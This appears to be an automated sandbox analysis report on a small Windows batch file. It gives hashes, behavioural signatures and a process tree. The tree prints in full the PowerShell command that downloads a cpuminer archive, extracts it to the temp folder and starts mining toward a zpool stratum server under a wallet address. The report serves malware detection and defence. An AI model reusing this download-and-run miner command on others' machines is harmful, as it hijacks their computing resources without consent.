Analysis
max time kernel: 1798s
max time network: 1802s
platform: windows10-1703_x64
resource: win10-20231215-en
resource tags: arch:x64, arch:x86, image:win10-20231215-en, locale:en-us, os:windows10-1703-x64, system
submitted: 03/02/2024, 05:12

Static task: static1
Behavioral task: behavioral1 (Sample: 73u3Ito.bat; Resource: win10-20231215-en)
Behavioral task: behavioral2 (Sample: 73u3Ito.bat; Resource: win10v2004-20231215-en)

General
Target: 73u3Ito.bat
Size: 508B
MD5: d9af861fbfd5f212c2db65e7ed0cd376
SHA1: f9316adde0463e645cc0624f645faad3b972320a
SHA256: f1afc81fa5c304ba261d76f1941e54ebe25a3a7651b0a45e646183382ec03bc4
SHA512: 92eb6c1e2a0e1cf196c97c9e9a9f3c53967f9ae58a2b675ce18e967b0e414e6b17ade6e914e96817df1878bbe11022b4737bae0d4078a257de9a132eb1a91536
Malware Config
Signatures
- Blocklisted process makes network request (2 IoCs)
  flow  pid   Process
  2     4228  powershell.exe
  4     4228  powershell.exe
- Executes dropped EXE (1 IoC)
  pid   Process
  4280  cpuminer-sse2.exe
- Loads dropped DLL (5 IoCs)
  pid   Process
  4280  cpuminer-sse2.exe
  4280  cpuminer-sse2.exe
  4280  cpuminer-sse2.exe
  4280  cpuminer-sse2.exe
  4280  cpuminer-sse2.exe
- Suspicious behavior: EnumeratesProcesses (3 IoCs)
  pid   Process
  4228  powershell.exe
  4228  powershell.exe
  4228  powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  description              pid   Process
  Token: SeDebugPrivilege  4228  powershell.exe
- Suspicious use of WriteProcessMemory (6 IoCs)
  description                        pid   Process         procid_target
  PID 4488 wrote to memory of 4228   4488  cmd.exe         74
  PID 4488 wrote to memory of 4228   4488  cmd.exe         74
  PID 4228 wrote to memory of 3252   4228  powershell.exe  76
  PID 4228 wrote to memory of 3252   4228  powershell.exe  76
  PID 3252 wrote to memory of 4280   3252  cmd.exe         77
  PID 3252 wrote to memory of 4280   3252  cmd.exe         77
Processes (indented entries are children of the entry above)
1. C:\Windows\system32\cmd.exe (PID 4488)
   Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\73u3Ito.bat"
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4228)
      Command line: powershell.exe -Command "Invoke-WebRequest -Uri 'https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip' -OutFile "$env:TEMP\cpuminer.zip"; Expand-Archive -Path "$env:TEMP\cpuminer.zip" -DestinationPath "$env:TEMP\cpuminer"; Set-Location -Path "$env:TEMP\cpuminer"; Start-Process -FilePath 'cmd.exe' -ArgumentList '/k', 'cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge,zap=PRIV -t 2'"
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      3. C:\Windows\system32\cmd.exe (PID 3252)
         Command line: "C:\Windows\system32\cmd.exe" /k cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge,zap=PRIV -t 2
         - Suspicious use of WriteProcessMemory
         4. C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe (PID 4280)
            Command line: cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge,zap=PRIV -t 2
            - Executes dropped EXE
            - Loads dropped DLL
Downloads